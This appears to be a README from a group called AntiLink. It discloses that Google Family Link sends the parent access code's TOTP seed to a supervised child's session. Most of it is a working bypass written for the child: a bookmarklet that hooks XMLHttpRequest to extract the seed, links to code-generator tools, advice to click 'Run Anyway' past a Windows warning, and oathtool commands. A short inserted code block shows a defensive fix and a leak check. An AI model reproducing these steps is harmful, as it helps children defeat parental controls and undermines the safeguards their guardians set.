An oversight in Google's Family Link allows a supervised child to gain access and generate unlimited "parent access codes" (TOTP-based) for the past, present, and future.
A parent access code is a 6-digit TOTP (time-based one-time password) that typically only the parent should be able to generate.
The code can be used on Android and ChromeOS devices to:
- Unlock the device
- Remove Google account (and by extension, Family Link)
- Change daily limit for apps
- Change downtime
- Unblock apps
- Skip 24-hour post graduation lock
- Ensure you're signed into Chrome on your child account.
- Save this bookmarklet (for mobile, make a bookmark for example.com and replace its URL with this).
javascript:void%20function(){javascript:globalThis.oldXHR=XMLHttpRequest;globalThis.XMLHttpRequest=function(){const%20a=new%20globalThis.oldXHR;return%20a.addEventListener(%22load%22,()=%3E{let%20b=JSON.parse(a.response);b[1][0].some(a=%3Ea.some(a=%3Ea.startsWith(%22BedtimeCardId%22)))%26%26alert(b[2][3][0])}),a}}();
- Navigate to familylink.google.com and click the bookmarklet as fast as you can. Make sure to click it before the splash screen disappears.
- You'll get a popup with a string starting with "AI". Copy the string and store it somewhere. This is the shared secret for the parent access code.
You can put the string you just got into https://antilink.pages.dev/ and press Enter to get your Family Link code.
Alternatively, you can use the GUI implementation at https://github.com/anti-link/fl_codegen_gui to generate the codes completely offline (and for a custom timestamp/any time in the future).
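The root cause is that a response served to the supervised account's session carries the TOTP seed. As an added example (not code from Google or the AntiLink project; the function names, session roles and response layout are hypothetical, with the layout constructed to mirror the indices the bookmarklet reads), this puts a role-scoped serializer next to the leaky one, plus a release check that scans what a child session receives for the seed:

```javascript
// Added example: every name and the response layout here are hypothetical.
// Constructed sample seed, not a real Family Link secret.
const SAMPLE_SEED = "AI-constructed-sample-seed";
const family = { parentAccessSeed: SAMPLE_SEED };

// Leaky shape: the same payload, seed included, goes to every family member.
function buildResponseVulnerable(session, fam) {
  return [null, [[["BedtimeCardId:1"]]], [null, null, null, [fam.parentAccessSeed]]];
}

// Hardened shape: the seed is serialized only for parent sessions.
// Assumption: only parent sessions need the seed in this response.
function buildResponseHardened(session, fam) {
  const seedField = session.role === "parent" ? [fam.parentAccessSeed] : [];
  return [null, [[["BedtimeCardId:1"]]], [null, null, null, seedField]];
}

// Walk arbitrarily nested arrays/objects and collect the path of every
// string that contains the secret.
function findSecretPaths(value, secret, path = "$", hits = []) {
  if (typeof value === "string") {
    if (value.includes(secret)) hits.push(path);
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findSecretPaths(v, secret, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === "object") {
    for (const [k, v] of Object.entries(value)) {
      findSecretPaths(v, secret, `${path}.${k}`, hits);
    }
  }
  return hits;
}

// Release check: serialize as the wire would, parse it back, then scan
// what a supervised (child) session would actually receive.
function leaksToChild(build, fam) {
  const wire = JSON.stringify(build({ role: "child" }, fam));
  return findSecretPaths(JSON.parse(wire), fam.parentAccessSeed);
}

console.log("vulnerable:", leaksToChild(buildResponseVulnerable, family));
console.log("hardened:  ", leaksToChild(buildResponseHardened, family));
```

Because a TOTP code is a function of the seed and the time only, a non-empty result from this check means the child session can derive every code, so it should fail the build.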
- Navigate to https://github.com/anti-link/fl_codegen_gui/releases/ and download the most recent binary for your system.
- Click on codegen_gui_windows_x86_64.exe, or the appropriate binary for your system.
- Open the file once downloaded. You may get a "Windows protected your PC" popup. Click "More Info" and then "Run Anyway". The software is completely safe and you can review the source code at https://github.com/anti-link/fl_codegen_gui/ .
- Now you can enter the shared secret from before, and a timestamp for any date in the future if you wish to generate codes in advance.

Yes, you can generate codes for any date in the future in case you might need them. Go to https://www.unixtimestamp.com/ and choose a time you'd like to have a parent access code for, then use the Unix timestamp it produces in the GUI.
Compiling is turning the GUI code into an executable file locally on your machine. You should only compile if:
- We aren't providing a binary on the releases page for your OS
- You just want to compile locally so you can trust the binary more

Otherwise, just download from the releases page on GitHub.
- Ensure you have a recent version of Rust installed
- Run `cargo build --release`
- Find your binary in `target/release`.
This exploit was made by the team at AntiLink:
- Spencerpogo - Rust implementation of the FL codegen.
- r58playz - bookmarklet to obtain seed & website
- rifting - founding AntiLink and making the Family Link Code generation GUI
- Sleepachu - idea of reverse engineering the parent access code
- Amaan - discovering sending of TOTP seed to child
- ProgrammerIn-wonderland, VadSzil42, & mertcinarsah - Discussing and coming up with great ideas for exploits
As pointed out by a member of r/familylink, it's also worth noting that oathtool can generate these codes too.

```
echo -n <shared secret> | base32
oathtool -b -s 60s -N "`date +"%F %H:00:00 %Z"`" --totp <shared secret in base32>
```
This isn't really practical but I can see some small uses for it